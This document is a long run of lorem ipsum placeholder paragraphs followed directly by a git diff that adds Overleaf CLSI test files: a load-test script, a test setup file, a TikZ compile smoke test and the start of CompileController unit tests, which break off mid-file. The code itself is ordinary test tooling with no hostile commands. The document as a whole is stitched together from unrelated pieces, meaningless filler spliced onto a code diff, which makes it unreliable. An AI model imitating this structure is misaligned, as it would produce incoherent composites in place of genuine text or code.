Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Etiam dignissim varius eros vitae molestie. Aenean molestie nisl ac bibendum laoreet. Sed placerat pellentesque augue, sit amet commodo turpis condimentum vitae. Duis a purus placerat, tempor nulla ac, rutrum ipsum. 
Donec lectus nisi, laoreet quis diam eget, finibus scelerisque ante. Aliquam erat volutpat. Integer convallis justo vel nibh vehicula molestie. Donec ut mi eget est pulvinar euismod. In id ligula ut enim venenatis fermentum. In metus leo, rutrum ac mollis tincidunt, semper quis lacus. Sed lobortis, augue in condimentum suscipit, augue velit tempor leo, eu mollis turpis lectus auctor orci. + +Nullam efficitur erat ut dolor tristique condimentum. Suspendisse pretium ex ut bibendum ullamcorper. Phasellus dapibus enim sed tellus condimentum, sit amet mattis tellus cursus. Phasellus venenatis augue in lacus suscipit, vel hendrerit felis vehicula. Cras consectetur cursus lorem vulputate cursus. Vestibulum nec auctor sem. Nam ultricies, mi a ullamcorper eleifend, enim magna elementum erat, a accumsan turpis nunc et tortor. Donec venenatis maximus lacus vitae sodales. Donec dapibus rutrum porta. Nulla facilisi. Vivamus aliquam ex vitae sem consequat blandit. Nullam ultricies, ante ac rutrum efficitur, magna ligula maximus turpis, ut porta est velit et magna. Vestibulum mauris massa, posuere nec convallis in, maximus a nulla. Mauris vitae lorem sed nulla aliquam tempor. Fusce vel fringilla metus, ac aliquet metus. + +Ut ac mattis augue. Fusce cursus at quam ut vehicula. In laoreet cursus urna eu fermentum. Suspendisse est mauris, gravida interdum urna a, ullamcorper hendrerit arcu. Donec dapibus blandit massa nec vulputate. Nam a lacus pretium, imperdiet risus ac, aliquam nunc. Nulla facilisi. Vivamus quam libero, vestibulum sed tellus eget, ornare gravida dolor. Sed placerat nulla in velit imperdiet mattis. Sed at arcu eleifend, scelerisque urna non, porta massa. In volutpat commodo quam et sollicitudin. + +Donec in magna ullamcorper, auctor ex malesuada, tincidunt dui. Etiam enim risus, cursus sit amet ante ut, blandit tincidunt purus. Etiam rutrum dolor nulla, vel feugiat quam convallis sit amet. In finibus mi tortor, non hendrerit purus dictum at. Vivamus condimentum elementum neque et maximus. Cras auctor iaculis metus, at vulputate justo rhoncus eu. Aliquam laoreet mi euismod, lacinia est nec, euismod augue. In viverra tincidunt dolor vitae porttitor. Proin congue, mi eu laoreet congue, libero nunc porttitor tellus, non dictum magna erat sed purus. In nec luctus ligula, vel gravida urna. Sed lacinia mollis justo at hendrerit. Pellentesque gravida laoreet risus non auctor. Praesent ac sollicitudin eros. Vestibulum non viverra magna, sodales tristique ipsum. + +Etiam et lacinia eros, ut scelerisque turpis. Sed elit tortor, varius in nibh at, tempor euismod massa. Sed dapibus purus nec felis venenatis, nec rhoncus eros sagittis. Nullam elit orci, facilisis nec nunc sed, lobortis sagittis metus. Proin aliquam pharetra sagittis. Etiam ultrices nulla quis posuere elementum. Sed ultrices justo justo, eu tempor turpis rutrum vel. Pellentesque at cursus tellus. Vestibulum pulvinar tellus eget felis posuere bibendum. Etiam nec orci eleifend, gravida ipsum mollis, facilisis erat. In efficitur ac metus vel aliquam. Quisque arcu est, malesuada ut ligula ac, consectetur rutrum ex. Quisque varius viverra gravida. Suspendisse id leo quis felis imperdiet fringilla. Aenean ac accumsan urna. Fusce sapien mauris, varius pellentesque porta lobortis, tempus scelerisque metus. + +Vivamus tempus interdum felis, quis gravida ipsum auctor at. Cras sed ligula eu mauris semper pellentesque. Donec ut nibh at odio tempus euismod. Interdum et malesuada fames ac ante ipsum primis in faucibus. 
Aliquam ultrices odio ut faucibus mollis. Curabitur tincidunt accumsan luctus. Suspendisse tincidunt magna mi, et euismod nulla feugiat quis. Fusce finibus ac velit id fermentum. Aliquam venenatis egestas aliquam. Nulla diam libero, consectetur eu enim ac, dictum tempor lectus. Ut id tempus augue. Nulla facilisis, massa sit amet ultricies ultrices, eros lacus eleifend ex, vitae facilisis velit urna non leo. Ut libero ligula, venenatis ac odio id, posuere hendrerit eros. Cras eget sapien at mauris iaculis tincidunt. Nullam ut neque nisi. Aliquam hendrerit, magna non pellentesque iaculis, nulla libero molestie augue, non vehicula tortor sapien porttitor eros. + +Sed eget lectus nec enim porta gravida. Vestibulum id tincidunt nunc. Quisque scelerisque condimentum ipsum, eu accumsan orci facilisis non. Duis venenatis, est et mattis finibus, turpis urna rhoncus urna, gravida ultrices ipsum neque vitae erat. Vivamus massa enim, tristique vulputate faucibus a, luctus non dui. Vestibulum non risus lorem. Suspendisse eu orci accumsan, molestie enim nec, convallis augue. + +Nullam sed arcu turpis. Quisque ut elementum velit. Maecenas vitae sem vel eros vehicula hendrerit. Aenean suscipit convallis justo. Morbi in consectetur diam. Donec et efficitur justo, vestibulum convallis turpis. Proin sit amet enim id enim tempor tempus. Nam est augue, consectetur vitae ligula ut, tristique consequat nibh. + +Ut pharetra tortor auctor risus posuere, nec hendrerit nibh rhoncus. Aliquam tincidunt aliquam felis, at dignissim justo fermentum quis. Aenean malesuada, eros a ornare varius, sapien ex mollis nunc, vitae bibendum augue lectus vel mi. Nulla ultricies dui sed tellus sodales, at iaculis urna elementum. Sed et lacinia urna. Integer commodo nulla non quam rhoncus, bibendum tristique massa finibus. In posuere, lectus id tristique tristique, risus mauris consectetur erat, fringilla mattis metus eros in velit. Praesent est eros, tempor vel vulputate ut, luctus ut libero. Phasellus a urna porttitor, aliquam enim non, varius ipsum. Cras non ante ut ante egestas condimentum. Praesent finibus eleifend eros, tempor feugiat neque semper eget. Duis ullamcorper condimentum aliquet. Interdum et malesuada fames ac ante ipsum primis in faucibus. + +Curabitur eget orci aliquet, pulvinar enim quis, hendrerit lectus. Suspendisse sed dictum lorem, nec porttitor ligula. Aliquam sit amet ligula sed lorem consectetur rhoncus ut a mauris. Quisque a ipsum sit amet augue mollis lobortis id nec risus. Phasellus vulputate justo in eros sodales vulputate. Fusce leo magna, condimentum quis vehicula id, malesuada at justo. Donec fringilla tortor in ullamcorper viverra. Vestibulum efficitur, quam ac consectetur dignissim, metus libero tincidunt libero, quis ultrices nisi mi eu erat. Nulla pharetra iaculis ullamcorper. Donec sit amet tortor congue risus elementum venenatis. Maecenas nisl nunc, imperdiet nec mattis sit amet, dignissim eget sapien. Nullam tristique turpis eu ante tempor, nec suscipit tortor sodales. Quisque cursus a orci quis molestie. Sed sit amet venenatis leo. Maecenas felis lacus, accumsan at accumsan non, ornare quis dolor. + +Aliquam vel enim eros. Curabitur sit amet risus ligula. Aliquam eget iaculis lacus, vitae efficitur nisl. Vestibulum convallis, risus at lacinia tempus, libero tortor rhoncus augue, id fringilla ipsum massa eget lorem. Maecenas justo leo, dignissim vitae finibus a, vehicula quis eros. Vivamus vel nisl porttitor, aliquam sapien et, semper risus. Praesent at sem tellus. 
Fusce sit amet fringilla elit. Nullam lorem sapien, vulputate eget lacus interdum, fermentum rutrum neque. Nulla scelerisque massa a felis cursus euismod. + +Mauris a mi posuere, eleifend velit in, luctus nisi. Donec mattis lacus velit, non laoreet odio posuere ac. Nulla efficitur fringilla orci a porta. Vestibulum est magna, fermentum id tempor eget, volutpat vel magna. Nunc non aliquam urna, ut congue urna. Aliquam purus nunc, pretium eget vehicula sed, vehicula sed sem. Quisque pellentesque velit sit amet orci dapibus tristique. Cras fringilla velit id ultrices scelerisque. Praesent porta egestas mauris, vitae accumsan quam. Aliquam molestie, magna sit amet maximus feugiat, arcu mauris ultricies lorem, id aliquam turpis arcu ac mauris. Etiam eu scelerisque neque. Donec sed quam vel est dictum convallis quis posuere tortor. Sed sit amet tortor eros. Sed odio purus, egestas at lacinia sed, consectetur id diam. Quisque tincidunt, ante eget mattis cursus, felis ante venenatis leo, in eleifend erat diam eu eros. + +Sed ac nunc mauris. Sed hendrerit ligula efficitur facilisis tincidunt. Morbi ut ornare lorem, sed facilisis ex. Aenean aliquam tristique mi, ac tristique metus rutrum eget. Curabitur id leo id massa commodo sagittis in at elit. Morbi viverra bibendum ligula vitae tristique. Etiam at est interdum, euismod nibh nec, condimentum arcu. Etiam orci ex, sagittis et tincidunt quis, finibus eu sapien. Sed urna lorem, suscipit a gravida vitae, sollicitudin vitae dolor. Cras ut imperdiet massa. Fusce ornare iaculis ipsum a cursus. Pellentesque vulputate, justo vel tincidunt egestas, lacus odio convallis odio, eu porttitor felis ipsum vitae libero. + +Phasellus eget nulla eget est convallis ornare ac non enim. Integer tincidunt massa eu tincidunt euismod. Proin at nulla in dui malesuada venenatis vitae at ligula. Curabitur dapibus mauris vitae turpis euismod, et pharetra quam molestie. Nulla id faucibus tortor. Pellentesque ultrices, turpis vel lobortis fermentum, sapien diam rhoncus sapien, quis tristique turpis lorem a mi. Nam bibendum, sem eget congue interdum, lacus orci convallis elit, ac porttitor lorem erat et orci. Integer elementum tortor et nisl posuere consectetur. Sed malesuada leo ac urna lacinia, malesuada luctus mauris faucibus. Duis consequat posuere lobortis. Cras interdum lacinia lacus. Cras ipsum sapien, porttitor eget pellentesque ut, aliquam ut magna. Integer luctus velit et elementum malesuada. Maecenas tempus mauris quis mollis posuere. + +Maecenas consequat urna elit, eget fringilla felis laoreet ac. In congue ullamcorper odio, sed malesuada turpis luctus sed. Nullam sodales interdum elit ac dignissim. Pellentesque placerat mollis velit, vulputate tristique neque aliquet vitae. Phasellus tempor viverra est, vitae vehicula justo imperdiet nec. Fusce dictum lacinia urna eget rhoncus. Nam imperdiet nisl orci, sed ultricies orci laoreet vel. In in pulvinar eros. Ut eu rhoncus eros. Suspendisse eu dui viverra, lacinia erat vitae, mattis metus. Aliquam vitae posuere sapien. Quisque eu lorem quis mi egestas varius. Aliquam erat volutpat. + +Duis eu arcu lobortis, vehicula orci ac, imperdiet dui. Etiam venenatis nisi quam, quis dapibus erat sagittis non. Suspendisse lacinia blandit interdum. Vivamus vitae sollicitudin leo. Vivamus sit amet commodo tellus, ac sagittis augue. Vivamus mi orci, ultricies ac nulla at, pharetra maximus diam. Nullam rhoncus volutpat magna eu auctor. + +Etiam commodo enim a leo pellentesque, in elementum odio lobortis. 
Vestibulum lobortis lobortis malesuada. Sed imperdiet ullamcorper viverra. Cras facilisis malesuada purus a consequat. Ut auctor neque mi, in scelerisque nibh ornare eu. In non dui in enim pretium ullamcorper non rutrum urna. Donec dictum porta orci sed malesuada. Morbi ac placerat felis. Aliquam lacus sem, ullamcorper sed laoreet ut, imperdiet non libero. Nunc non metus id justo accumsan ultricies. Donec in lacinia eros. Morbi non nunc diam. Aenean nisl massa, vestibulum vel fringilla vel, placerat eu leo. Sed feugiat malesuada ultricies. + +Nulla tristique massa eu tortor feugiat auctor. In viverra eu ex quis auctor. Praesent ac sapien orci. Proin sit amet orci posuere, ultricies orci in, fermentum justo. Vivamus tempus, ligula et aliquam egestas, enim orci pulvinar dui, in ultricies mauris turpis eu nisi. Pellentesque nec dui in ipsum laoreet convallis. Vestibulum a mi ornare, elementum ex sed, rhoncus neque. + +Nullam sed orci id sem tincidunt suscipit. Cras ac leo at magna facilisis blandit. Aliquam vitae tristique nisi. Nulla vestibulum felis pretium lectus commodo, id eleifend risus eleifend. Mauris bibendum facilisis est vitae scelerisque. Cras interdum dapibus ligula, nec porta lacus imperdiet at. Cras rhoncus bibendum lorem, congue mollis libero dignissim eget. Sed gravida, mauris sit amet sodales posuere, tellus felis imperdiet arcu, quis iaculis orci orci vitae ipsum. Curabitur id orci odio. Aliquam vitae rutrum lacus. + +Maecenas tristique est felis, eget posuere lorem dapibus non. Maecenas eu interdum lectus. Nullam placerat sit amet quam non hendrerit. Nulla facilisis ornare mollis. Cras sed metus facilisis, mattis dui in, auctor est. Morbi vehicula venenatis est, vitae egestas felis tincidunt vitae. Donec iaculis massa id justo ornare rhoncus. Nulla tempor felis ex, eu consectetur justo dictum sed. Integer eget laoreet nibh. Duis vitae pellentesque tellus, id blandit justo. Cras quis mollis eros. Quisque rhoncus dignissim enim at sollicitudin. Vestibulum sit amet diam sed quam sodales finibus. Nulla maximus orci sit amet porttitor vestibulum. Nam consequat urna at varius vulputate. + +Suspendisse laoreet luctus mauris. Aenean mollis felis urna, ac pretium nunc rutrum non. Aenean semper, risus vitae iaculis eleifend, odio ligula tempus nunc, sit amet suscipit nibh lorem quis ipsum. Nam et placerat sapien. In luctus accumsan risus, id pulvinar elit venenatis eu. Phasellus elementum leo urna, a dapibus neque facilisis eget. Sed sit amet tempor tortor. Fusce iaculis, ipsum nec faucibus scelerisque, felis tortor condimentum purus, in fringilla ex est ac nisl. Nunc et interdum diam. Donec venenatis, dolor quis dignissim euismod, libero ante elementum libero, vitae laoreet purus velit sit amet ipsum. Quisque urna tellus, imperdiet eget gravida a, fringilla commodo diam. + +In posuere nisi dictum tortor elementum iaculis. In dignissim diam sit amet volutpat elementum. Curabitur ultricies mi libero, sit amet feugiat massa viverra sed. Vivamus justo nibh, commodo nec elementum eu, suscipit vel elit. Fusce ac cursus libero, et volutpat augue. In tempus ultricies libero, ac rutrum mauris. Morbi vestibulum tellus eu dui dignissim euismod. In hac habitasse platea dictumst. + +Nam rhoncus hendrerit ex et mattis. Sed varius, arcu quis placerat viverra, ex lorem ultrices arcu, nec fringilla ipsum metus ut ligula. Sed in luctus mi. Pellentesque sed eros nisl. Praesent rutrum magna metus, vel efficitur eros lobortis efficitur. Mauris vestibulum urna at ligula lobortis sollicitudin. 
Aenean rhoncus auctor leo vel interdum. Cras sollicitudin massa leo, et eleifend metus scelerisque sit amet. Praesent dapibus euismod libero a fermentum. + +Curabitur cursus lacus sit amet est feugiat euismod. Nulla accumsan risus congue lorem facilisis scelerisque. In sed lectus elementum, porttitor nisl vulputate, pulvinar mi. Maecenas eu mollis odio. In faucibus sagittis magna, vitae mollis nisi iaculis non. Aenean dictum lectus ac arcu vehicula fringilla. Curabitur accumsan efficitur libero, eget consequat magna ultrices vel. Donec fermentum vel orci eget finibus. Etiam in massa ante. Mauris gravida enim lacus, sit amet accumsan massa suscipit a. Mauris id bibendum ex, et convallis nisl. Morbi luctus, orci in malesuada finibus, neque turpis convallis justo, id gravida sem purus eget turpis. Fusce eu laoreet justo. + +Nulla facilisi. Nulla varius risus quam, sit amet aliquam felis lacinia a. Ut sapien felis, tincidunt in pellentesque sit amet, vehicula id elit. Morbi a congue nunc. Sed justo neque, rutrum tincidunt hendrerit in, luctus at mauris. Suspendisse porttitor ex vitae felis luctus, et bibendum eros consequat. Maecenas vitae lectus eget est volutpat fermentum ac ac elit. In hac habitasse platea dictumst. Aenean luctus ex nec orci euismod aliquam. Integer a dolor elementum, mollis magna vitae, porta dui. In ac erat posuere, facilisis lacus eget, venenatis velit. Nulla ut sapien tincidunt, ultricies lectus aliquet, varius odio. Curabitur viverra congue ipsum, non finibus enim lobortis vitae. + +Duis vestibulum maximus est, sollicitudin dapibus sapien accumsan sit amet. Cras luctus, massa malesuada ornare imperdiet, dolor lorem blandit est, a blandit erat quam vel tortor. Vestibulum id semper ipsum. Ut nec ante eget velit fringilla sagittis. Duis sit amet lobortis nisi. Aenean interdum dui ut metus suscipit, a pretium tortor ultrices. Nullam tincidunt bibendum nisl, vitae tincidunt urna tincidunt tempus. Donec vitae porta sem. Phasellus venenatis egestas ligula, quis volutpat ipsum lacinia et. Pellentesque placerat ipsum elit, a feugiat libero scelerisque fringilla. Suspendisse ullamcorper congue nisi ut fringilla. Aliquam quis suscipit orci. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nam at nulla volutpat, viverra sem ac, blandit erat. Quisque gravida quam eu magna hendrerit, quis varius diam scelerisque. Suspendisse nisi enim, dignissim sit amet tristique ut, tempus sodales nibh. + +Nulla ac eleifend leo. Quisque laoreet finibus mattis. Nam est nulla, maximus sed luctus non, volutpat quis ipsum. Praesent et quam dolor. Nulla facilisi. Aliquam enim orci, volutpat vitae mattis pellentesque, fringilla ut eros. Fusce semper arcu et sapien rutrum laoreet. Maecenas vel imperdiet lectus. Mauris et pulvinar justo. Mauris sed luctus diam. Fusce a odio eget ante consequat volutpat. Nullam at lorem ut dui ornare aliquam nec non justo. Mauris turpis eros, blandit eget elementum ullamcorper, molestie vel quam. Aenean pretium interdum ligula ac fringilla. Aenean et felis lorem. Ut id lectus quis risus finibus condimentum. + +Curabitur aliquet quis justo sed posuere. Donec eu libero eget mi ullamcorper placerat. Etiam massa mi, lobortis eget fermentum in, facilisis vel lectus. In hac habitasse platea dictumst. Nam laoreet sodales metus, nec finibus nulla volutpat bibendum. Aenean ut vulputate dolor, vitae venenatis est. Fusce ipsum libero, laoreet sit amet justo at, auctor tristique arcu. Praesent pellentesque efficitur velit non accumsan. 
Proin fermentum tempus ante, at eleifend lectus fringilla sit amet. Nunc et diam ac velit tristique malesuada a id mauris. Sed euismod turpis lacus, a maximus dolor semper in. Nulla mauris tortor, dignissim vel mauris sed, efficitur ultrices nulla. Donec sed molestie libero. Quisque nec congue eros, ut consequat lectus. Suspendisse vitae tortor sapien. Sed vitae pellentesque dolor. + +Suspendisse dictum velit metus, vel mollis erat imperdiet ut. Mauris et sapien eleifend, malesuada ante vehicula, ornare tellus. Integer condimentum mattis risus, nec luctus lacus convallis a. Phasellus bibendum consequat nisi, ut consequat dui bibendum a. Sed venenatis lobortis turpis, a venenatis ex sodales eu. Duis sit amet sem dui. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla vitae tellus a ex tristique mattis. Quisque viverra vitae turpis accumsan imperdiet. Cras nunc erat, commodo et malesuada at, vulputate in lorem. Fusce tempor venenatis dui consequat auctor. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Suspendisse potenti. + +Fusce et ligula sem. In condimentum dolor metus, eu luctus justo ultrices nec. Aenean vitae ligula non erat tincidunt blandit. Pellentesque luctus tellus ante, mollis cursus arcu posuere a. Ut sed lacus suscipit, dapibus quam non, elementum purus. Nullam sed venenatis tortor, id luctus lacus. Suspendisse orci felis, porta et sagittis at, posuere vitae lectus. + +Cras in ligula ut mi viverra efficitur at sed erat. Donec congue suscipit orci, eu volutpat augue ultricies non. Maecenas imperdiet tincidunt commodo. Cras quis vulputate urna, et malesuada lorem. Donec id convallis nibh, non congue lacus. Curabitur et scelerisque nisl. Maecenas vestibulum elit ipsum, in posuere tortor placerat sit amet. Nullam nec ex eget libero mattis commodo a at leo. Vestibulum aliquet, eros quis facilisis aliquam, mi arcu aliquet nisl, in tempus massa sapien at tortor. + +Maecenas et dolor sed sapien lacinia fringilla eget et nibh. Aenean viverra urna sit amet lobortis vestibulum. Aliquam vehicula rutrum magna ut aliquam. Maecenas pharetra volutpat porttitor. In id ultricies sapien, a accumsan lectus. Fusce in elit a ex auctor rutrum sit amet ac lorem. Mauris eu mi a nisl vehicula mattis. Donec dictum velit nec libero bibendum, in volutpat metus viverra. Vivamus eget sollicitudin nunc, ac vestibulum erat. Sed dolor risus, semper nec lorem vitae, vehicula molestie purus. Quisque ac lectus iaculis, ultrices leo sit amet, mattis erat. Curabitur lorem mauris, vestibulum vel risus eu, molestie facilisis elit. Pellentesque habitant morbi tristique senectus et netus et volutpat. diff --git a/services/clsi/test/load/js/loadTest.js b/services/clsi/test/load/js/loadTest.js new file mode 100644 index 0000000..506b51b --- /dev/null +++ b/services/clsi/test/load/js/loadTest.js @@ -0,0 +1,101 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const request = require('request')
+const Settings = require('@overleaf/settings')
+const async = require('async')
+const fs = require('node:fs')
+const _ = require('lodash')
+const concurrentCompiles = 5
+const totalCompiles = 50
+
+const buildUrl = path =>
+  `http://${Settings.internal.clsi.host}:${Settings.internal.clsi.port}/${path}`
+
+const mainTexContent = fs.readFileSync('./bulk.tex', 'utf-8')
+
+const compileTimes = []
+let failedCount = 0
+
+const getAverageCompileTime = function () {
+  const totalTime = _.reduce(compileTimes, (sum, time) => sum + time, 0)
+  return totalTime / compileTimes.length
+}
+
+const makeRequest = function (compileNumber, callback) {
+  let bulkBodyCount = 7
+  let bodyContent = ''
+  while (--bulkBodyCount) {
+    bodyContent += mainTexContent
+  }
+
+  const startTime = new Date()
+  return request.post(
+    {
+      url: buildUrl(`project/loadcompile-${compileNumber}/compile`),
+      json: {
+        compile: {
+          resources: [
+            {
+              path: 'main.tex',
+              content: `\
+\\documentclass{article}
+\\begin{document}
+${bodyContent}
+\\end{document}\
+`,
+            },
+          ],
+        },
+      },
+    },
+    (err, response, body) => {
+      if (err != null) {
+        failedCount++
+        return callback(new Error(`compile ${compileNumber} failed`))
+      }
+      if (response.statusCode !== 200) {
+        failedCount++
+        return callback(new Error(`compile ${compileNumber} failed`))
+      }
+      const totalTime = new Date() - startTime
+      console.log(totalTime + 'ms')
+      compileTimes.push(totalTime)
+      return callback(err)
+    }
+  )
+}
+
+const jobs = _.map(
+  __range__(1, totalCompiles, true),
+  i => cb => makeRequest(i, cb)
+)
+
+const startTime = new Date()
+async.parallelLimit(jobs, concurrentCompiles, err => {
+  if (err != null) {
+    console.error(err)
+  }
+  console.log(`total time taken = ${(new Date() - startTime) / 1000}s`)
+  console.log(`total compiles = ${totalCompiles}`)
+  console.log(`concurrent compiles = ${concurrentCompiles}`)
+  console.log(`average time = ${getAverageCompileTime() / 1000}s`)
+  console.log(`max time = ${_.max(compileTimes) / 1000}s`)
+  console.log(`min time = ${_.min(compileTimes) / 1000}s`)
+  return console.log(`total failures = ${failedCount}`)
+})
+
+function __range__(left, right, inclusive) {
+  const range = []
+  const ascending = left < right
+  const end = !inclusive ? right : ascending ? right + 1 : right - 1
+  for (let i = left; ascending ? i < end : i > end; ascending ? i++ : i--) {
+    range.push(i)
+  }
+  return range
+}
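For readability: the decaffeinate-generated __range__ helper above just builds an inclusive integer range, so the job list is equivalent to a plain lodash expression. A minimal sketch, assuming makeRequest and totalCompiles as defined in loadTest.js above (illustrative only, not part of the commit):

    const _ = require('lodash')

    // _.range is half-open, so extend the upper bound by one to match
    // __range__(1, totalCompiles, true), which includes totalCompiles itself.
    const jobs = _.range(1, totalCompiles + 1).map(i => cb => makeRequest(i, cb))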
diff --git a/services/clsi/test/setup.js b/services/clsi/test/setup.js
new file mode 100644
index 0000000..b17507b
--- /dev/null
+++ b/services/clsi/test/setup.js
@@ -0,0 +1,29 @@
+const chai = require('chai')
+const sinonChai = require('sinon-chai')
+const chaiAsPromised = require('chai-as-promised')
+const SandboxedModule = require('sandboxed-module')
+
+// Setup chai
+chai.should()
+chai.use(sinonChai)
+chai.use(chaiAsPromised)
+
+// Global SandboxedModule settings
+SandboxedModule.configure({
+  requires: {
+    '@overleaf/logger': {
+      debug() {},
+      log() {},
+      info() {},
+      warn() {},
+      error() {},
+      err() {},
+    },
+  },
+  globals: { Buffer, console, process, URL, Math },
+  sourceTransformers: {
+    removeNodePrefix: function (source) {
+      return source.replace(/require\(['"]node:/g, "require('")
+    },
+  },
+})
diff --git a/services/clsi/test/smoke/js/SmokeTests.js b/services/clsi/test/smoke/js/SmokeTests.js
new file mode 100644
index 0000000..18aa562
--- /dev/null
+++ b/services/clsi/test/smoke/js/SmokeTests.js
@@ -0,0 +1,108 @@
+const request = require('request')
+const Settings = require('@overleaf/settings')
+
+const buildUrl = path =>
+  `http://${Settings.internal.clsi.host}:${Settings.internal.clsi.port}/${path}`
+
+const url = buildUrl(`project/smoketest-${process.pid}/compile`)
+
+module.exports = {
+  sendNewResult(res) {
+    this._run(error => this._sendResponse(res, error))
+  },
+  sendLastResult(res) {
+    this._sendResponse(res, this._lastError)
+  },
+  triggerRun(cb) {
+    this._run(error => {
+      this._lastError = error
+      cb(error)
+    })
+  },
+  lastRunSuccessful() {
+    return this._lastError == null
+  },
+
+  _lastError: new Error('SmokeTestsPending'),
+  _sendResponse(res, error) {
+    let code, body
+    if (error) {
+      code = 500
+      body = error.message
+    } else {
+      code = 200
+      body = 'OK'
+    }
+    res.contentType('text/plain')
+    res.status(code).send(body)
+  },
+  _run(done) {
+    request.post(
+      {
+        url,
+        json: {
+          compile: {
+            options: {
+              metricsPath: 'health-check',
+            },
+            resources: [
+              {
+                path: 'main.tex',
+                content: `\
+% Membrane-like surface
+% Author: Yotam Avital
+\\documentclass{article}
+\\usepackage{tikz}
+\\usetikzlibrary{calc,fadings,decorations.pathreplacing}
+\\begin{document}
+\\begin{tikzpicture}
+  \\def\\nuPi{3.1459265}
+  \\foreach \\i in {5,4,...,2}{% This one doesn't matter
+    \\foreach \\j in {3,2,...,0}{% This will create a membrane
+                               % with the front lipids visible
+      % top layer
+      \\pgfmathsetmacro{\\dx}{rand*0.1}% A random variance in the x coordinate
+      \\pgfmathsetmacro{\\dy}{rand*0.1}% A random variance in the y coordinate,
+                                     % gives a height fill to the lipid
+      \\pgfmathsetmacro{\\rot}{rand*0.1}% A random variance in the
+                                      % molecule orientation
+      \\shade[ball color=red] ({\\i+\\dx+\\rot},{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)}) circle(0.45);
+      \\shade[ball color=gray] (\\i+\\dx,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-0.9}) circle(0.45);
+      \\shade[ball color=gray] (\\i+\\dx-\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-1.8}) circle(0.45);
+      % bottom layer
+      \\pgfmathsetmacro{\\dx}{rand*0.1}
+      \\pgfmathsetmacro{\\dy}{rand*0.1}
+      \\pgfmathsetmacro{\\rot}{rand*0.1}
+      \\shade[ball color=gray] (\\i+\\dx+\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-2.8}) circle(0.45);
+      \\shade[ball color=gray] (\\i+\\dx,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-3.7}) circle(0.45);
+      \\shade[ball color=red] (\\i+\\dx-\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-4.6}) circle(0.45);
+    }
+  }
+\\end{tikzpicture}
+\\end{document}\
+`,
+              },
+            ],
+          },
+        },
+      },
+      (error, response, body) => {
+        if (error) return done(error)
+        if (!body || !body.compile || !body.compile.outputFiles) {
+          return done(new Error('response payload incomplete'))
+        }
+
+        let pdfFound = false
+        let logFound = false
+        for (const file of body.compile.outputFiles) {
+          if (file.type === 'pdf') pdfFound = true
+          if (file.type === 'log') logFound = true
+        }
+
+        if (!pdfFound) return done(new Error('no pdf returned'))
+        if (!logFound) return done(new Error('no log returned'))
+        done()
+      }
+    )
+  },
+}
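The smoke-test module above only exports helper functions; it does not register any HTTP routes itself. A minimal sketch of how a service could expose it as health-check endpoints, assuming Express and illustrative route paths (neither is taken from this commit):

    const express = require('express')
    const SmokeTests = require('./services/clsi/test/smoke/js/SmokeTests')

    const app = express()
    // Trigger a fresh compile and report its outcome in this response.
    app.get('/health_check/full', (req, res) => SmokeTests.sendNewResult(res))
    // Report the outcome of the most recent run without recompiling.
    app.get('/health_check', (req, res) => SmokeTests.sendLastResult(res))
    app.listen(3013) // port chosen arbitrarily for the sketch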
diff --git a/services/clsi/test/unit/js/CompileControllerTests.js b/services/clsi/test/unit/js/CompileControllerTests.js
new file mode 100644
index 0000000..e6d21ae
--- /dev/null
+++ b/services/clsi/test/unit/js/CompileControllerTests.js
@@ -0,0 +1,497 @@
+const SandboxedModule = require('sandboxed-module')
+const sinon = require('sinon')
+const modulePath = require('node:path').join(
+  __dirname,
+  '../../../app/js/CompileController'
+)
+const Errors = require('../../../app/js/Errors')
+
+describe('CompileController', function () {
+  beforeEach(function () {
+    this.buildId = 'build-id-123'
+    this.CompileController = SandboxedModule.require(modulePath, {
+      requires: {
+        './CompileManager': (this.CompileManager = {}),
+        './RequestParser': (this.RequestParser = {}),
+        '@overleaf/settings': (this.Settings = {
+          apis: {
+            clsi: {
+              url: 'http://clsi.example.com',
+              outputUrlPrefix: '/zone/b',
+              downloadHost: 'http://localhost:3013',
+            },
+            clsiCache: {
+              enabled: false,
+              url: 'http://localhost:3044',
+            },
+          },
+        }),
+        '@overleaf/metrics': {
+          Timer: sinon.stub().returns({ done: sinon.stub() }),
+        },
+        './ProjectPersistenceManager': (this.ProjectPersistenceManager = {}),
+        './CLSICacheHandler': {
+          notifyCLSICacheAboutBuild: sinon.stub(),
+          downloadLatestCompileCache: sinon.stub().resolves(),
+          downloadOutputDotSynctexFromCompileCache: sinon.stub().resolves(),
+        },
+        './Errors': (this.Errors = Errors),
+      },
+    })
+    this.Settings.externalUrl = 'http://www.example.com'
+    this.req = {}
+    this.res = {}
+    this.next = sinon.stub()
+  })
+
+  describe('compile', function () {
+    beforeEach(function () {
+      this.req.body = {
+        compile: 'mock-body',
+      }
+      this.req.params = { project_id: (this.project_id = 'project-id-123') }
+      this.request = {
+        compile: 'mock-parsed-request',
+      }
+      this.request_with_project_id = {
+        compile: this.request.compile,
+        project_id: this.project_id,
+      }
+      this.output_files = [
+        {
+          path: 'output.pdf',
+          type: 'pdf',
+          size: 1337,
+          build: 1234,
+        },
+        {
+          path: 'output.log',
+          type: 'log',
+          build: 1234,
+        },
+      ]
+      this.RequestParser.parse = sinon
+        .stub()
+        .callsArgWith(1, null, this.request)
+      this.ProjectPersistenceManager.markProjectAsJustAccessed = sinon
+        .stub()
+        .callsArg(1)
+      this.stats = { foo: 1 }
+      this.timings = { bar: 2 }
+      this.res.status = sinon.stub().returnsThis()
+      this.res.send = sinon.stub()
+
+      this.CompileManager.doCompileWithLock = sinon
+        .stub()
+        .callsFake((_req, stats, timings, cb) => {
+          Object.assign(stats, this.stats)
+          Object.assign(timings, this.timings)
+          cb(null, {
+            outputFiles: this.output_files,
+            buildId: this.buildId,
+          })
+        })
+    })
+
